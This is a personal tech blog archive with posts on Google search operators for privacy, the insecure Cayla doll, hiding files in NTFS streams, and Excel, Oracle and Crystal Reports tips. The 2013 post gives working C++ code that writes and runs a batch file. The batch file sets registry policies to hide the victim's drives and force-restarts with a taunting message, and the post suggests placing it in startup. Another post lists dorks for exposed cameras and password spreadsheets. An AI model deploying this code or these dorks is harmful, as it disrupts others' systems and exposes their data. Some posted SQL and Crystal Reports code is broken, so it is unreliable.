Thursday, November 8, 2018


Google Safety and You
DISCLAIMER: As with all things in this blog, information can be misused. Please keep in mind that too much Google Hack commands will result in Google verification capta. 

Because the search engine, Google, has become practically synonymous for the Internet these days, to be safe online—really is to be safe through Google. Not only are jobs and relationships gained and lost based on Google—but an ever-increasing danger—has become online stalking. We all need to be mindful that we may be potential phishing targets. But how, you might ask, can one be safe through a tool whose very nature is to expose? The answer is as simple--as it is complex: understand the underlaying structures supporting the search engine--and redirect its purpose to better inform and protect yourself. 

So together lets take a moment to talk about:

·        Google: a nest of spiders
·        From basic to advanced: Google search commands
·        That’s not me: Image theft and fake accounts
·        What others are Googling: Trending searches, and who is looking
·        Taking control of the Spiders: Google alerts and automated searches
·        Controlled content: Setting up restricted search engines within Google

Google: a nest of spiders
So—what exactly IS Google, and what makes it different than the other search engines? What sets Google apart from the other search engines, is something called Page Rank. Page Rank is a proprietary algorithm that assigns a rank to websites, as they are discovered online by network traverses by programs known as Google Spiders (Googlebots) who crawl the web. As they crawl, they build up the Google Cache, ie a collection of known sites with known characteristics. Page Rank determines what shows up first when you do a Google search. Other search engines place their ranking on the number of links leading to a page. Google, on the other hand, takes into consideration not only the number of links—but the importance of the pages being linked from to the target source. The importance of a page, in turn, is determined by the number of visitors—and in some cases—the money paid to Google to give it a higher ranking. There are of course other controversial factors in page ranking (for example, your current location determines search results), but this is the basic idea.

Websites can also ‘talk’ to these spiders through a robot.txt page, which tells the spider not to return certain pages or extensions. (try Googling inurl:robots.txt filetype:txt for some examples) You might have heard about something called the ‘Dark Web.’ These are simple sites that the spiders fail to crawl, or cannot reach (DNS error, server error, or just an incorrect robots.txt file can cause this too).

From basic to advanced: Google search commands
In the last section, we referenced Google commands that you might not be familiar with—the inurl and the filetype. There are many more of these commands, known as Google Hacks. We care about them—because the bad guys use them to look at us online. We need to understand what they see, so that we can better protect ourselves against online vulnerabilities.

Lets do a basic Google search to show you that concept in practice. We will do this manually—but keep in mind that hackers, stalkers, hobbyists, and intelligence/law enforcement—use programs that send these commands en mas.

I simply Google myself, Olivia Terrell. Nothing much comes up, except for some random jewelry company that I have nothing to do with, and pictures that look nothing like me, even on a good day.

Looking at the results, we see that pages with just Olivia or just Terrel are returning. So next I refine that search a little bit to include only cases where Olivia and Terrell appear together. I can do this one of two ways—with a ‘+’ sign, or with “ “. The ‘+’ means that both Olivia and Terrell have to both appear somewhere in a document—but not necessarily together. Googling “Olivia Terrell” brings the intact phrase back.

You will probably see a lot of your information on sites where you never even signed up (PeopleSearch, Spokeo, Ancestry, ect). They got the information from lists that are bought and sold online from a variety of sources—some are open source related to CORA (like when you register to vote) and some are through loans or other transactions, or when you sign up for “free” social media site accounts. Some of your information ends up online because of well meaning relatives, trying to do genealogy research.

Remember to also google your email addresses, phone number, address and usernames to see where your data is being used. It is amazing how long data hangs around. For example, if I google oeterrel, all the tech forums and even an old powerpoint out of college turn up.

You may also see your email being sold in spam lists.

Suppose I cared not just about keywords linked to a page—but the contents of the page. That’s where the intext command comes in. The number of hits that are actually me, climbs. That command would look something like this:

Intext:” Olivia Terrell”

Now, lets suppose I only want to see PDFs or documents with my information in them. Why? Because you’d be amazed how many documents you turn up in online that you don’t remember or know about—and how much about you they can reveal.  To do this, I add the filetype command:

 intext:"Olivia Terrell" filetype:pdf

If I wanted to see pdfs or docs, I would use the pipe command, which Google understands as ‘or’.

intext:"Olivia Terrell" filetype:pdf | filetype:doc

Notice that Google commands are additive. We can just keep adding to our string. Order does not matter either. Now suppose I want only items with my name in them, with file type of pdf, but only on websites that are .edu. That is where the inurl command comes in. The syntax would look something like this:

intext:"Olivia Terrell" filetype:pdf | filetype:doc inurl:edu

Or, you could simply narrow your search to a particular website:

intext:"Olivia Terrell" site:www.denvergov.org

This list is by no means exhaustive—there are many more commands. But just from these very simple Google hacks, a complete stranger, knowing only my name could quickly figure out:
·        The names of my family
·        Where I live
·        My voting status (if you find your voting status online—there is a link at the bottom to delete it)
·        My phone number(s) and email addresses
·        Where I work
·        Any groups/forums/committees or interests

All of this would be more than enough to spoof an email to me at home or work, pretending to know my family or to have met me through work somewhere, in the hopes of conning me out of information or money.

There are other nefarious uses as well. Consider for example, if a person were to search for part of a login screen URL—or part of a video path (i.e. something like: inurl:/view/viewer_index.shtml ) on an unsecured video networking system, an index.html page, or even just searching for xlxs files that contain the word pwd in them. This actually happens all the time.

That’s not me: Image theft and fake accounts
If someone steals your written information and creates accounts, you can easily find them via these Google Hacks—but what if all they steal is your image? Most of us are familiar with this happening on Facebook (if you have not, check out https://www.nbcnews.com/business/consumer/fake-facebook-profiles-cause-heartbreak-families-colleagues-n895091 for an example story)—but few of us realize that dating sites often buy entire databases of images to populate fake accounts and attract members.

To see if someone has stolen your profile image, go to https://images.google.com/ It will look like an ordinary search screen. Drag and drop your profile image from your computer straight into where you would usually type your search:













Google will bring up visually similar images, its best guess as to what you are trying to search (in my case, a Selfie), and at the bottom of the page—everywhere that image is used online:

While there are many places you might find a fake account, in Facebook, the steps to report an account may be found here:
If you find your information on some strange dating site, find a help link to their tech support—and complain. Most companies would rather quietly delete an issue to make it go away—rather than face unwanted publicity.

What others are Googling: Trending searches, and who is looking
There is another feature of Google worth noting—Google Trends https://trends.google.com/ Google Trends allows you to see how popular other searches are. This doesn’t matter as much for online security—but is super useful for tracking the progress of things like the flu. Most people do not even think of the flu (or any disease) until they have symptoms, then the first stop is usually Google. Googling “flu symptoms” in Google Trends over the past 90 days, shows that the virus is spreading at a pretty even rate—and Kentucky is the hot spot.

If we localize to Colorado—Grand Junction is the epicenter of Google flu searches so far.

Another reason to watch Trends—is because phishers and spammers do. Whenever there is a significant uptick in a particular search, like stories about natural disaster or candidate, the phishers and spammers may use this information in their attacks.

Taking control of the Spiders: Google alerts and automated searches
Ok, so we’ve learned there’s a lot of Google queries out there we can run—but who has time for that? Never fear—you can tell Google to do all that for you. Simply go to Google alerts at https://www.google.com/alerts From there, simple paste in some of the Google searches we talked about earlier in this document. Remember you can string commands together or use the ‘|’ (logical or) to make a bunch of queries into one. 

If you expand the ‘show options’, you will be able to control how often the Google query is performed and sent to you. By default, Google performs the query at least once a day.


Controlled content
Another nifty tool that Google provides—is the ability to customize the search to only a specific set of sites. This is useful when you have younger children, have a specific topic you want to research, or just elderly parents who don’t care for all the clutter online. This tool is called Google Custom search. To use Google search, go to https://cse.google.com/cse/ and login with a gmail account.

Click the Add button:


Fill in the sites you’d like to restrict a search to























Then scroll down and click Create. It will then give you the option to add the HTML code to any webpages you are creating—or access the URL directly. I admit, the URL looks rather boring—but having more control over what Google is searching for you, does have its security pluses.

Once you get a custom Google set up the way you’d like, you can also make it the default homepage.

I hope this very brief tutorial has peaked your interest in just how powerful the search engine Google is—and inspired you to research further into Google hacks, trends, alerts, searches and page rankings. With endless open information—sadly, comes open risk. Be safe, and happy Googling.



Tuesday, April 12, 2016

"Hacking" the Cayla doll

I put the hacking in quotations--because the Cayla doll really does not need real "hacking" to make it say naughty things... I am creating this post because the Cayla doll is soooo very non-secure. It can communicate with your child and make basic internet queries--but has NO encryption on data and NO password! Anyone with the App can bluetooth to any Cayla doll.

I discovered this to my astonishment--and dismay--when I purchased one in order to demonstrate how dangerous the Internet of Things can be to children.

The first thing you need--is the doll. They retail around 50 to 60 dollars at Walmart.
The second thing you need--is the Cayla app.

Step 1: Bluetooth with the doll after downloading the Cayla app.
Step 2: Select the 'Settings' icon. Click the icon that looks like a face.

Step 3: Override the default values. As soon as you click 'done', the doll will say whatever you type. It has a crude filter against bad words, but you can override that by simply sounding out the bad words phonetically. For example, biatch sounds EXACTLY like the other b word. (entries below are strictly for example purposes).


And it really is just that simple... kinda scary, when you think about it...

Tune in next time on the Internet of Things, toy edition--when we hack the iBarbie. Lets hope its not as easy as "hacking" the Cayla was...

Tuesday, January 19, 2016

Hiding a file using CMD commands

So you have a password file of dating sites or some other list of passwords, but are concerned that your girlfriend or administrator may be looking? Consider your old friend the command line! (works on NTFS systems, has not been tested on Windows 10)

Open you CMD. Create your directory, or navigate to the folder you want to hide your file in

I created a location called 'Olivia' and navigated there with the CD command.

C:\Documents and Settings\Olivia Terrell>mkdir olivia
C:\Documents and Settings\Olivia Terrell>cd olivia

Once there, I envoked Notepad and created my decoy file 'seeme.txt'.

C:\Documents and Settings\Olivia Terrell\olivia>notepad.exe seeme.txt

I added some random text to the file and checked the visible contents by typing 'type seeme.txt.'

C:\Documents and Settings\Olivia Terrell\olivia\ type seeme.txt
You can see me now
You can see me

I then created my hidden file on the 'back' of my decoy file like this.
C:\Documents and Settings\Olivia Terrell\olivia\ notepad.exe seeme.txt:hidden.txt

 I entered my passwords and saved the file. I then checked my Olivia directory to make sure that the hidden.txt file is not visible. 

C:\Documents and Settings\Olivia Terrell\olivia dir
 Volume in drive C has no label.
 Volume Serial Number is 8CB3-ACDA

 Directory of C:\Documents and Settings\Olivia Terrell\olivia
          ..
01/19/2016  06:15 PM                34 seeme.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,939,438,592 bytes free

Only the 'seeme.txt' displays. 

In summary. I typed this:
But anyone navigating to the Olivia folder or typing DIR from the command prompt only sees this:
 And the only way to see the hidden file--is by typing notepad.exe seeme.txt:hidden.txt from the command prompt...

Thursday, July 11, 2013

Understanding simple virus's and their interactions with HKeys

Let me begin this blog by saying that building a virus to attack a computer or nextwork that is not yours, or which you are not authorised to attack is highly illegal. This tutorial is only for educational purposes. This code is presented "as is" and you should not use it--unless you can figure out how to undo it on your own...

That being said--today we are going to discuss how to make a simple Windows XP virus-like program that makes your hard-drives appear to disappear. They aren't really gone--just hidden. 

How do we do this? HKEY values. Drive A is denoted by 1, Drive B is 2, Drive C is 4, Drive D is 8, Drive E is 16, ect. The value doubles all the way to the Z drive. If I wanted to disable the A drive through the D Drive, we would add A+D, i.e. 1+8=9. If we wanted the C through D drives, it would be 4+8=12.

This is what the line REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n  accomplishes. NoViewonDrives keeps the Explorer from displaying the drives--NoDrives blocks access.


This is the code you will need. Copy it and save it as a .cpp file. This code was compiled using the Cygwin compiler and will need different libraries if you intend to use something like Visual C++. Cygwin is a good Unix emulator. However, you must compile your .cpp folder that the cyggcc_s-1.dll, cygstdc++-6.dll and cygwin1.dll are stored, or it will not compile. In addition, when you execute your a.exe file, it must be executed with the 3 above mentioned .dll files in the same folder.

Yes--I could have made the package more elegant--but since this is not intended to actually be used as a "real" virus, I thought I'd leave some mystery to deployment.

That being said, this is the code.

#include
#include
#include
#include

using namespace::std;

int main()
{

ofstream write("V9.bat" ); //opening or creating new .bat file


//hide the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";

//don't let anyone use the run function to get to the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
write<<"shutdown -r -c \"Your computers drives belong to us\" -f"<<"\n";
write<<"Resistance is futile";

write.close(); //close file


ShellExecute(NULL,"open","V9.bat ",NULL,NULL,SW_SHOWNORMAL);

return 0;
}

This is what the code does when it executes. Pardon the blurry image


 And this is what the computer looked like when it fired up again. Yes--for all those nerds out there wondering--I was testing it in a virtualbox. Notice that the only thing visible is the E Drive. C and D are gone.

Notice that you could just copy/paste out all the commands that are sent to the .bat file--create the file yourself and store it in the program start-up of a computer to auto launch on its own...

As you can see, HKEYs can often be the key to creating viruses--and the first place to look when troubleshooting for one on your own machine.

Friday, October 26, 2012

Excel: Removing duplicates but keeping blank spaces

So you have finally gotten the 65,000 row spreadsheet from your boss that absolutely positively MUST be done before next weeks big meeting--but it has duplicate numbers in one column. You need every row--but you only want one of those column values to show for that row. What to do?

Example given data

John Project Manager
John Director of Human Resources
John Technology Supervisor

Desired data

John Project Manager
        Director of Human Resources
        Technology Supervisor

You could either manually erase all the extra column values and replace them with blank spaces--OR you could get create with Excel and run a formula to sift out all the extraneous data.

Copy your column data into another worksheet and put it into column A. In column B, write this formula:

=IF(COUNTIF(A$1:A1,A1)>1,"",A1)

You will see the first value in column B populate. Stretch this column all the way down and paste the contents into Wordpad or Notepad. Why not paste it back into your original Excel worksheet, you ask? Well--Microsoft Excel has this nasty habit of wanting to reference an equation instead of showing the equation results when you copy it into Excel. The work a round is to copy the data elsewhere first--then copy the data from Notepad or Wordpad BACK into your original excel, replacing your duplicated column.

It takes some practice--but is far better than the alternative manual erase method.

Thursday, September 6, 2012

Finding the modification date of an Oracle table

So a change has been applied to your Oracle database by your somewhat secretive database administrator or vendor--and you would like to know which tables/views to keep an eye on--but how?

Never fear... there is a query for that...

select * from all_objects

You are looking for a column called last_ddl_time. THAT is the last date that the item was modified. The created column is... well... the day the item was created. The timestamp column is the long form of this creation date

To see all the tables that have been modified simply type:
select * from all_objects where object_type='TABLE'

Similarly, to see all the views the query would be
select * from all_objects where object_type='TABLE'

And if we wanted to narrow the query down further to see the exact changes to the database from our database administrator, we might try something like this:

select * from all_objects where last_ddl>=(sysdate-1)

Trust me--copy this post out and save it... you will end up needing it...

Tuesday, August 21, 2012

Converting a minutes to hours, minutes,seconds format

So you have finally reached the point when 145.8 minutes simply will not work for your boss... But how to convert to Hours, Minutes, Seconds format in Crystal Reports?

Everyone knows how to convert minutes to days and seconds--but telling your program is an different matter entirely. The secret is the Mod operator. When we convert from minutes to hours minutes and seconds, the first thing we do is divide our total number of minutes by 60 and shed the remainder as minutes. This is done via the Mod operator. It returns the remainder after division. So 144/60 = hours and 144 Mod 60=minutes and seconds is (144 mod 60)/60... In Crystal Reports, we have to multiply the number of seconds time 100 to avoid unsightly decimal points.

The code is fairly straightforward once you get the hang of it:

Pseudo-Code:
If you code is large enough to contain hours
then show the number without decimal places as hours
show the number of minutes without decimals
show the seconds
Otherwise, if your total does not contain hours
then the total number of seconds is found after the decimal place in the minutes column

Code:
if({your_total}/60>1) then                          
  cstr(({your_total}/60,0,'')+' Hours, '         
  + cstr({your_total} mod 60,0,'')+' Minutes' 
  +cstr(({your_total}mod 60,0,'')/60*100,0,'') + 'Seconds'   

else                                                      
  cstr({your_total}mod 60,0,'')+'Minutes '+cstr((({your_total}mod 60)-{your_total})*100,0,'')+'Seconds'

And that is the basic idea. You will need to make modifications if you need to break down by day/month/year... but this should get you started.